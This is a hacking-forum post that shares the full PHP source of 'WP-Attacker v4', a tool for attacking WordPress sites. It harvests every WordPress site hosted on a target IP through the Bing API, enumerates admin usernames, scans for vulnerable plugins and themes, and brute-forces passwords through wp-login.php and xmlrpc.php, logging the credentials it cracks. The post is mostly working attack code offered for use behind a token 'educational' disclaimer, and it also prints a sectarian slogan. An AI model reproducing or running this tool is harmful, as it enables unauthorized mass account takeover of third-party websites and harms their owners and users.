Jump to content
Aerosol

WP-Attacker v4

By Aerosol, in Programe hacking

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted

WP-ATTACKER v.4

Credit's to: Hannibal Ksa

What's new ?

  • Grab all wordpress websites on the server via Bing API
  • Scan all the possible plugins/themes on each website from a list (provided by the user)
  • Brute Force using the correct username and a passwords list via xmlrpc.php *NEW*
  • Brute Force using the correct username and a passwords list via wp-login.php *MODIFIED*
  • Scan all the possible plugins/themes on each website from security databases *MODIFIED*
  • Change the appearance of the tool

Plugins/themes List format:

  • XP:wp-content/plugins/XP/lib/exploit.php:Group-XP



  • XP = plugin/theme 's name



  • wp-content/plugins/XP/lib/exploit.php = plugin/theme 's path



  • Group-XP = Keyword (clue to double check if its there!)


NOTE: Keyword value is optional in this version

the Tool uses two methods to check plugins and/or themes, which are:

  • Keyword.
  • Headers Respond.

Passwords list:

123456
password
admin
whateva

--------------

What's new ?

  • Brute Force using two methods:
  • The usual way : wp-login.php
  • The new way : xmlrpc.php

Checking plugins and/or themes using two methods:

  • Keyword (provided by the user).
  • Headers.

Any list could be used with a simple modification as an example:

HERE !

Pictures for Brute Forcing (Success!):

  • XMLRPC

161au8l.jpg

  • WP-LOGIN

e5qn1i.jpg

Before downloading you must have a BING API Hash: here

Link download: HERE

<?php
/*


              ??????? ???????  ??????? ???   ??????????     ???  ?????????? 
             ???????? ????????????????????   ???????????    ????????????????
             ???  ???????????????   ??????   ???????????     ?????? ????????
             ???   ??????????????   ??????   ??????????      ?????? ??????? 
             ????????????  ????????????????????????         ???? ??????     
              ??????? ???  ??? ???????  ??????? ???         ???  ?????? ALM3REFH.COM 


    ???    ??????????      ?????? ?????????????????? ??????  ??????????  ?????????????????? 
    ???    ???????????    ????????????????????????????????????????????? ????????????????????
    ??? ?? ???????????    ????????   ???      ???   ???????????     ??????? ??????  ????????
    ?????????????????     ????????   ???      ???   ???????????     ??????? ??????  ????????
    ?????????????         ???  ???   ???      ???   ???  ??????????????  ??????????????  ???
     ???????? ???         ???  ???   ???      ???   ???  ??? ??????????  ??????????????  ??? FORTH VERSION

    WP Attacker v4 © Group XP 2014

    Coder : Hannibal Ksa (@r00t3rz)
    Home  : alm3refh.com, sec4ever.com


    What's WP Attacker:
    - Scan the server's websites, and filter the ones that are using WorePress (Using Bing search engin [API]).
    - Get All the possible plugins and themese, which are vulnerable (Using a list). *UPDATED*
    - BruteForce each website that uses Wordpress (Using a correct username and a passwords list).
    - BruteForce each website that uses Wordpress (via XMLRPC's file using a correct username). *NEW*
    - Get All the possible plugins and themes, which are vulnerable (Using security dbs). *UPDATED*
    - Exploit 'em (Using more than 20 new/0day exploits). *UNDERGROUND*

    Why WP Attacker?
    - Using Bing API, Which leads to faster & guaranteed responde.
    - User can use his own 0day exploits.
    - BruteForce with two methods/ways.
    - List can be updated by the user.
    - Fast, simple and easy.

    # In a simple word, it is an "Automatic WP Exploiter".

    Disclaimer:
    - THIS TOOL WAS WRITTEN FOR EDUCATIONAL PURPOSES. ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST
    - THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR DAMAGE ARISING WITH THE USE OF THIS TOOL.
    - USE IT UNDER YOUR OWN RISK!
    - IF YOU DON'T AGREE WITH WHAT I SAID, PLEASE DON'T USE THIS TOOL.

    Thanks and enjoy.

    And stay tuned!
    Best regards, Ali (aka Hannibal Ksa).

*/
error_reporting(0);
function clear(){
    ##########################
    ##   CLEAN THE SCREEN   ##
    ####################################################
    ##  FIXED TO BE ABLE TO WORK ON OSX AND OTHER OS  ##
    ####################################################
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { #strtolower(PHP_SHLIB_SUFFIX) === 'dll'
        @System('clear'); # Linux/UNIX/OS X
    }
}
function banner(){
    ##########################################################
    ##    BANNERS/COPYRIGHTS  R00T3RZ.COM & ALM3REFH.COM    ##
    ##   REMOVING THIS WILL ONLY MAKES YOU A "DOUCHEBAG!"   ##
    ##########################################################
    ####################
    ##  FIRST BANNER  ##
    ####################
    $bannerone = "\n\t  _      _____    ___ _______________  _______ _________";
    $bannerone .="\n\t | | /| / / _ \  / _ /_  __/_  __/ _ |/ ___/ //_/ __/ _ \\";
    $bannerone .="\n\t | |/ |/ / ___/ / __ |/ /   / / / __ / /__/ ,< / _// , _/";
    $bannerone .="\n\t |__/|__/_/    /_/ |_/_/   /_/ /_/ |_\___/_/|_/___/_/|_| \n";
    $bannerone .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
    #####################
    ##  SECOND BANNER  ##
    #####################
    $bannertwo = "\n\t           (                                              ";
    $bannertwo .="\n\t (  (      )\ )     (        )   )            )           ";
    $bannertwo .="\n\t )\))(   '(()/(     )\    ( /(( /(   )     ( /(   (  (    ";
    $bannertwo .="\n\t((_)()\ )  /(_)) ((((_)(  )\())\()| /(  (  )\()) ))\ )(   ";
    $bannertwo .="\n\t_(())\_)()(_))    )\ _ )\(_))(_))/)(_)) )\((_)\ /((_|()\  ";
    $bannertwo .="\n\t\ \((_)/ /| _ \   (_)_\(_) |_| |_((_)_ ((_) |(_|_))  ((_) ";
    $bannertwo .="\n\t \ \/\/ / |  _/    / _ \ |  _|  _/ _` / _|| / // -_)| '_| ";
    $bannertwo .="\n\t  \_/\_/  |_|     /_/ \_\ \__|\__\__,_\__||_\_\\\\___||_|   \n";
    $bannertwo .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
    ####################
    ##  THIRD BANNER  ##
    ####################
    $bannerthr = "\n\t _ _ _ _____    _____ _   _           _           ";
    $bannerthr .="\n\t| | | |  _  |  |  _  | |_| |_ ___ ___| |_ ___ ___ ";
    $bannerthr .="\n\t| | | |   __|  |     |  _|  _| .'|  _| '_| -_|  _|";
    $bannerthr .="\n\t|_____|__|     |__|__|_| |_| |__,|___|_,_|___|_|  \n";
    $bannerthr .="\n\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    #####################
    ##  FOURTH BANNER  ##
    #####################
    $bannerfor = "\n\t _    _______    ___  _   _             _             ";
    $bannerfor .="\n\t| |  | | ___ \  / _ \| | | |           | |            ";
    $bannerfor .="\n\t| |  | | |_/ / / /_\ \ |_| |_ __ _  ___| | _____ _ __ ";
    $bannerfor .="\n\t| |/\| |  __/  |  _  | __| __/ _` |/ __| |/ / _ \ '__|";
    $bannerfor .="\n\t\  /\  / |     | | | | |_| || (_| | (__|   <  __/ |   ";
    $bannerfor .="\n\t \/  \/\_|     \_| |_/\__|\__\__,_|\___|_|\_\___|_|   \n";
    $bannerfor .="\n\t\t    WP Attacker v4 - By Hannibal Ksa\n\n\n";
    ####################
    ##  FIFTH BANNER  ##
    ####################
    $bannerfiv = "\n\t???    ??????????      ?????? ?????????????????? ??????  ??????????  ?????????????????? ";
    $bannerfiv .="\n\t???    ???????????    ????????????????????????????????????????????? ????????????????????";
    $bannerfiv .="\n\t??? ?? ???????????    ????????   ???      ???   ???????????     ??????? ??????  ????????";
    $bannerfiv .="\n\t?????????????????     ????????   ???      ???   ???????????     ??????? ??????  ????????";
    $bannerfiv .="\n\t?????????????         ???  ???   ???      ???   ???  ??????????????  ??????????????  ???";
    $bannerfiv .="\n\t ???????? ???         ???  ???   ???      ???   ???  ??? ??????????  ??????????????  ???\n\n";
    $bannerfiv .="\t\t\t\t WP Attacker v4 - By Hannibal Ksa\n\n\n";
    #########################################
    ##   GET A RANDOME BANNER & PRINT IT   ##
    ##         METASPLOIT SWAG          ##
    #########################################
    $banner = array($bannerone, $bannertwo, $bannerthr, $bannerfor, $bannerfiv);
    print $banner[array_rand($banner)];
}
function noblackhat(){
    ##################
    ##  DISCLAIMER  ##
    ##################
    print "\n\t ______________________________________________";
    print "\n\t|    ____                        __  ______    |";
    print "\n\t|   / ___|_ __ ___  _   _ _ __   \ \/ /  _ \   |";
    print "\n\t|  | |  _| '__/ _ \| | | | '_ \   \  /| |_) |  |";
    print "\n\t|  | |_| | | | (_) | |_| | |_) |  /  \|  __/   |";
    print "\n\t|   \____|_|  \___/ \__,_| .__/  /_/\_\_|      |";
    print "\n\t|                        |_|ALM3REFH.com       |";
    print "\n\t|                                              |";
    print "\n\t+----------------------------------------------+";
    print "\n\t|       WP Attacker v4 - By Hannibal Ksa       |";
    print "\n\t+----------------------------------------------+\n\n";
    print "\n\t\t    !! NO SHIA / ONLY SUNNAH !!\n\n";
    ###########################
    ##  5 SECONDS DISCLAIMER ##
    ###########################
    print "\n\n\tThis tool may be used for legal purposes only.  Users take full
\tresponsibility for any actions performed using this tool.            
\tWP-ATTACKER comes with ABSOLUTELY NO WARRANTY!                             
\tIf these terms are not acceptable to you, then do not use this tool.
\n\tPlease Read! Continuing in 5 seconds ";
    sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ".";sleep(1);print ". ";
    print "\n\n\n\n";
}
function bing_it($hk){
    ##################
    ##   BING API   ##
    ###########################################################################
    ##   REPLACE [ $account_key ] VALUE WITH YOUR [ BING API ACCOUNT KEY ]   ##
    ##  MORE INFO [ [url]https://datamarket.azure.com/dataset/bing/search[/url] ]       ##
    ###########################################################################
    $account_key = 'ACCOUNT_KEY_GOES_HERE';
    $query = $hk;
    $url = "https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=".urlencode("'$query'")."&\$format=json";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FRESH_CONNECT,true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
    curl_setopt($ch, CURLOPT_USERPWD, $account_key . ":" . $account_key);
    $json = curl_exec($ch);
    curl_close($ch);
    $data = json_decode($json);
    foreach ($data->d->results as $value) {
        $file = fopen("sites.txt","a+");
        fwrite($file,"{$value->DisplayUrl}\n");
        fclose($file);
    }
}
function wp($list){
    ########################################
    ##   CHECK IF IS BUILT ON WORDPRESS   ##
    ########################################
    $file = file_get_contents($list);
    $get = explode('\n', $file);
    foreach($get as $site){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $site);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
        $result = curl_exec($ch);
        curl_exec($ch);
        curl_close($ch);
        if(preg_match("#wp-content#", $result) or preg_match("/wp-includes/", $result)){
            $filename = 'wp-sites.txt';
            $fp = fopen($filename, "a+");
            $write = fputs($fp, $site."\n");
            fclose($fp);
        }
    }
    $lines = file('wp-sites.txt');
    $lines = array_unique($lines);
    file_put_contents('wp-sites.txt', implode($lines));
}
function wp_em($list){
    ###############################
    ##   MAKE'EM CRYSTAL CLEAR   ##
    ###############################
    $file = file_get_contents($list);
    $get = explode("\n", $file);
    foreach($get as $wpsite){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $wpsite);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
        $result = curl_exec($ch);
        curl_exec($ch);
        curl_close($ch);
        preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url);
        $wpurl = str_replace("xmlrpc.php","",$url[1]);
        $filename = 'wp.txt';
        $fp = fopen($filename, "a+");
        $write = fputs($fp, $wpurl."\n");
        fclose($fp);
    }
    $lines = file('wp.txt');
    $lines = array_unique($lines);
    file_put_contents('wp.txt', implode($lines));
}
function xp_scanner($target, $list, $key = NULL){
    ##########################################################
    ##   PLUGINS AND THEMESE SCANNER SECOND/PUBLIC VERSION  ##
    ##########################################################
    ##  LIST FORMAT:  NAME:PATH:KEYWORD                     ##
    ##  EXAMPLE:  xp:wp-content/plugins/xp/xp.php:Group-XP  ##
    ##########################################################
    ##  NAME IS REQUIRED                                 ##
    ##  PATH IS REQUIRED                                 ##
    ##  KEYWORD IS OPTIONAL (?)                             ##
    ##########################################################
    $file = file_get_contents($list);
    $plugins = explode("\n", $file);
    #print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
    if($key == NULL){
        foreach($plugins as $plugin){
            #####################
            ##   GET HEADERS   ##
            #####################
            $x = explode(":", $plugin);
            $target = $target.'/'.$x[1];
            $check = @get_headers($target);
            if(eregi("200",$check[0])){
                ####################
                ##  PLUGIN FOUND  ##
                ####################
                print "\n\t[!] FOUND $x[0] -> $target";
                /*
                #############
                ## SAVE IT ##
                #############
                $data = $target." -> ".$x[0]."\n";
                $filename = 'vuln.txt';
                $fp = fopen($filename, "a+");
                $write = fputs($fp, $data);
                fclose($fp);
                */
            }#else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
        }
    }else{
        foreach($plugins as $plugin){
            #####################
            ##   GET KEYWORD   ##
            #####################
            $x = explode(":", $plugin);
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $target.'/'.$x[1]);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
            $result = curl_exec($ch);
            curl_exec($ch);
            curl_close($ch); 
            if(preg_match("#".$x[2]."#", $result)){
                ####################
                ##  PLUGIN FOUND  ##
                ####################
                print "\n\t[!] FOUND $x[0] -> $target";
                /*
                #############
                ## SAVE IT ##
                #############
                $data = $target." -> ".$x[0]."\n";
                $filename = 'vuln.txt';
                $fp = fopen($filename, "a+");
                $write = fputs($fp, $data);
                fclose($fp);
                */
            } #else { print "\n\t[-] NOT FOUND $x[0] -> $target"; }
        }
    }
}
function xp_get_plugins($target){
    #########################
    ##   GET ALL PLUGINS   ##
    #########################
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
    $result = curl_exec($ch);
    curl_exec($ch);
    curl_close($ch);
    preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
    $plugins = array_unique($plugin[1]);
    #if(count($plugins)==0){
    #    print "No Plugin was found.";
    #}
    foreach($plugins as $found){
        #print "\n\n$found\n\n";
        #################
        ##  SEARCH IT  ##
        #################
        xp_scanner_db($target, $found);
    }
}
function xp_get_themes($target){
    #########################
    ##   GET ALL PLUGINS   ##
    #########################
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
    $result = curl_exec($ch);
    curl_exec($ch);
    curl_close($ch);
    preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
    $themes = array_unique($theme[1]);
    #if(count($plugins)==0){
    #    print "No Plugin was found.";
    #}
    foreach($themes as $found){
        #print "\n\n$found\n\n";
        #################
        ##  SEARCH IT  ##
        #################
        xp_scanner_db($target, $found);
    }
}
function xp_scanner_db($target, $plugin){
    #######################################################################
    ##   PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION  ##
    #######################################################################
    ##  THIS VERSION ONLY CHECKS  ##
    ## - WORDPRESSEXPLOIT.COM     ##
    ## - EXPLOIT-DB.COM           ##
    ################################
    $wpexploit = array("http://www.wordpressexploit.com/", );
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $wpexploit);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
    $result = curl_exec($ch);
    curl_exec($ch);
    curl_close($ch);
    if(preg_match("#$plugin#", $result)){
        ##############
        ##  GOTCHA  ##
        ##############
        //print "\n\t$target -> seems to has a vulnerability plugin which is $plugin\n";
        ###############
        ##  SAVE IT  ##
        ###############
        $data = "\n[!] $target -> seems to has a vulnerability plugin which is [ $plugin ]";
        $filename = 'vulpl.txt';
        $fp = fopen($filename, "a+");
        $write = fputs($fp, $data."\n");
        fclose($fp);
    }
}
function xp_get_user($target,$list, $xmlrpc = NULL){
    ####################################
    ##     GET WORDPRESS USERNAME     ##
    ##  A SIMPLE ONE BUT WOTH A SHOT  ##
    ####################################
    $user = trim(($target))."/?author=1";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $user);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 
    $result = curl_exec($ch);
    curl_exec($ch);
    curl_close($ch);
    preg_match('#<title>(.*?)</title>#', $result, $username);
    $account = explode('|', $username[1]);
    if($xmlrpc == NULL){
        ###########################################################
        ##  START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
        ###########################################################
        return xp_brute($target,$account[0],$list);
    }else {
        ###########################################################
        ##  START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT  ##
        ###########################################################
        return xp_brute_xmlrpc($target,$account[0],$list);
    }
}
function xp_brute($target,$user,$list){
    ###########################################
    ##   BRUTE FORCE PULBLIC/FIRST VERSION   ##
    ###########################################
    ##  PASSWORDS LIST FORMAT:  PASSWORD\n   ##
    ##  EXAMPLE:  12345\np4ssw0rd            ##
    ##  ( \n = NEW LINE )                    ##
    ###########################################
    $file = file_get_contents($list);
    $passwords = explode("\n", $file);
    $target = trim($target);
    $user = trim($user);
    print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
    foreach($passwords as $password){
        #############################
        ##  TESTING EACH PASSWORD  ##
        #############################
        $redirect = $taregt."/wp-admin/";
        $curl = curl_init();
        curl_setopt($curl,CURLOPT_URL, $target."/wp-login.php");
        curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
        curl_setopt($curl,CURLOPT_TIMEOUT,10);
        curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
        curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
        curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
        $urlencode = urlencode("Log+In&redirect_to=$redirect&testcookie=1");
        curl_setopt($curl,CURLOPT_POSTFIELDS, "log=$user&pwd=$password&rememberme=forever&wp-submit=$urlencode");
        $result = curl_exec($curl);
        curl_close($curl);
        ##########################
        ##  CHECK IF IT WORKED  ##
        ##########################
        if(strstr($result, 'tab-panel-overview')){
            print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
            ###############
            ##  SAVE IT  ##
            ###############
            $data = "\n[!] Cracked $target -> [ $user:$password ]";
            $filename = 'cracked.txt';
            $fp = fopen($filename, "a+");
            $write = fputs($fp, $data."\n");
            fclose($fp);
            break;
        }#else{ print "\n[+] Trying $user:$password"; }
    }
}
function xp_check_xmlrpc($target){
    $target = $target."/xmlrpc.php";
    $check = @get_headers($target);
    if(eregi("200",$check[0])){
        return 1;
    }else{
        return 0;
    }
}
function xp_brute_xmlrpc($target,$user,$list){
    ######################################################
    ##   BRUTE FORCE VIA XMLRPC PULBLIC/FIRST VERSION   ##
    ######################################################
    ##  PASSWORDS LIST FORMAT:  PASSWORD\n              ##
    ##  EXAMPLE:  12345\np4ssw0rd                       ##
    ##  ( \n = NEW LINE )                               ##
    ######################################################
    $target = trim($target);
    $user = trim($user);
    if(xp_check_xmlrpc($target) != 1){
        print "\n[!] Couldn't find xmlrpc.php in $target\n";
        break;
    }else{
        $file = file_get_contents($list);
        $passwords = explode("\n", $file);
        print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
        foreach($passwords as $password){
            $password = trim($password);
            $headers = array('Content-Type: application/x-www-form-urlencoded');
            $isadmin = '<name>isAdmin</name>';
            #############################
            ##  TESTING EACH PASSWORD  ##
            #############################
            $data = "
            <methodCall>
                <methodName>wp.getUsersBlogs</methodName>
                <params>
                <param><value><string>$user</string></value></param>
                <param><value><string>$password</string></value></param>
            </params></methodCall>
            ";
            $curl = curl_init();
            curl_setopt($curl,CURLOPT_URL, $target."/xmlrpc.php");
            curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
            curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
            curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
            curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
            curl_setopt($curl,CURLOPT_TIMEOUT,10);
            curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
            curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
            curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
            curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
            $result = curl_exec($curl);
            curl_close($curl);
            ##########################
            ##  CHECK IF IT WORKED  ##
            ##########################
            if(strstr($result, $isadmin)){
                print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
                ###############
                ##  SAVE IT  ##
                ###############
                $data = "\n[!] Cracked $target -> [ $user:$password ]";
                $filename = 'cracked.txt';
                $fp = fopen($filename, "a+");
                $write = fputs($fp, $data."\n");
                fclose($fp);
                break;
            }#else{ print "\n[+] Trying $user:$password"; }
        }
    }
}
function bye(){
    ########################
    ##  DONE/SAY GOODBYE  ##
    ########################
    print "\n\n[+] DONE!\n[-] EXITING.\n\n";
    ######################
    ## DELETE LOG FILES ##
    ###################################################################
    ## NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
    ###################################################################
    unlink('sites.txt');
    unlink('wp-sites.txt');
    unlink('wp.txt');
    unlink('vuln.txt');
    unlink('cracked.txt');
    exit(2);
}
############################
##  COMMAND LINE'S  SHIT  ##
############################
clear();
noblackhat();
################################################
##  MAKE SURE IT RUNS ONLY FROM COMMAND LINE  ##
################################################
if( strtolower(php_sapi_name()) != 'cli' ) {
    printf("%s\n", "Please run only from command line interface.");
    exit;
}
clear();
banner();
print "\nIP-Address # ";
$target = trim(fgets(STDIN));
// if(!filter_var($targte, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
##############################
##   DELETE OLD LOG FILES   ##
##############################
unlink('sites.txt');
unlink('wp-sites.txt');
unlink('wp.txt');
unlink('vuln.txt');
unlink('cracked.txt');
unlink('vulpl.txt');
#############################
##   CREAT THE LOG FILES   ##
#############################
$log1 = fopen("sites.txt","w");fclose($log1);
$log2 = fopen("wp-sites.txt","w");fclose($log2);
$log3 = fopen("wp.txt","w");fclose($log3);
$log4 = fopen("vuln.txt","w");fclose($log4);
$log4 = fopen("cracked.txt","w");fclose($log4);
$log5 = fopen("vulpl.txt","w");fclose($log5);
###############################
##  SHIT IS GETTIN' REAL =P  ##
###############################
print "\nDORK [or simply leave it empty] # ";
$dork = trim(fgets(STDIN));
print "\n[+] Getting the server's sites";
if($dork == ""){
    #########################
    ##  IF DORK WAS EMPTY  ##
    #########################
    bing_it("ip:$target");
    bing_it("ip:".$target." /page_id=");
    bing_it("ip:".$target." Wordpress");
    bing_it("ip:".$target." blog");
}else{
    ###########################
    ##  USE THE USER'S DORK  ##
    ###########################
    bing_it("ip:".$target." ".$dork);
}
#print "\n[-] Got'em";sleep(1);
print "\n[+] Separating the sites";
wp('sites.txt');
#print "\n[-] We got the sites, which are using WordPress";sleep(1);
wp_em('wp-sites.txt');
#################
##   Results   ##
#################
print "\n[+] Finished, these are the website/s that I found:\n";
$wplist = file_get_contents('wp.txt');
$get = explode("\n", $wplist);
#print "[ ".count($get)." Website ]\n"; // empty lines will be counted
foreach($get as $hk){
    if(!$hk==""){
        print "\n\t[!] $hk";
    }
}
###########################
##   GIVE ME AN OPTION   ##
###########################
print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
$what = trim(fgets(STDIN));
$choice = array("1","2","3","4");
$yesno = array("y","yes");
if(in_array($what, $choice)){
    if($what == "1"){
        print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
        $list = trim(fgets(STDIN));
        if(!is_file($list)) {
            #######################
            ##  CAN'T LOAD LIST  ##
            #######################
            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
            ##############
            ##   EXIT   ##
            ##############
            bye();
        }
        #################
        ##   POOYAA!   ##
        #################
        print "\n[+] Scanning begun";
        $file = file_get_contents($list);
        $plugins = explode("\n", $file);
        print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
        $targets = file_get_contents('wp.txt');
        $r00t3rz = explode("\n", $targets);
        print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
        $key = strtolower(trim(fgets(STDIN)));
        if(in_array($key, $yesno)){
            $key = "set";
        }else{
            $key = NULL;
        }
        foreach($r00t3rz as $z){
            if(!$z == ""){
                xp_scanner($z, $list, $key);
            }
        }
        /*
        #################
        ##   Results   ##
        #################
        print "\n[+] Scanning finished!";
        $vul = file_get_contents('vuln.txt');
        $able = explode("\n", $vul);
        print '[ '.count($able).' Website ]\n';
        foreach($able as $gxp){
            if(!$gxp==""){
                print "\n\t[!] $gxp";
            }
        }
        */
        bye();
    } elseif($what == "2") {
        print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
        #################
        ##   POOYAA!   ##
        #################
        print "\n[+] Scanning begun";
        $targets = file_get_contents('wp.txt');
        $r00t3rz = explode("\n", $targets);
        foreach($r00t3rz as $z){
            if(!$z == ""){
                xp_get_plugins($z);
                xp_get_themes($z);
            }
        }
        #################
        ##   Results   ##
        #################
        print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
        $vulpl = file_get_contents('vulpl.txt');
        $getpl = explode("\n", $vulpl);
        #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
        foreach($getpl as $vul){
            if(!$vul==""){
                print "\n\t$vul";
            }
        }
        bye();
    } elseif($what == "3") {
        print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
        $list = trim(fgets(STDIN));
        if(!is_file($list)) {
            #######################
            ##  CAN'T LOAD LIST  ##
            #######################
            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
            ##############
            ##   EXIT   ##
            ##############
            bye();
        }
        #################
        ##   POOYAA!   ##
        #################
        print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
        $xmlrpc = strtolower(trim(fgets(STDIN)));
        if(in_array($xmlrpc, $yesno)){
            $xml = "set";
        }else{
            $xml = NULL;
        }
        print "\n[+] Bruting begun";
        $targets = file_get_contents('wp.txt');
        $xp = explode("\n", $targets);
        foreach($xp as $z){
            if(!$z == ""){
                xp_get_user($z, $list, $xml);
            }
        }
        bye();
    } else {
        ######################
        ##  OOH KILL'EM =P  ##
        ######################
        bye(); 
    }
}
#####################################
##  © ALM3REFH.COM 2014 - CHEERS!  ##
#####################################
?>

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...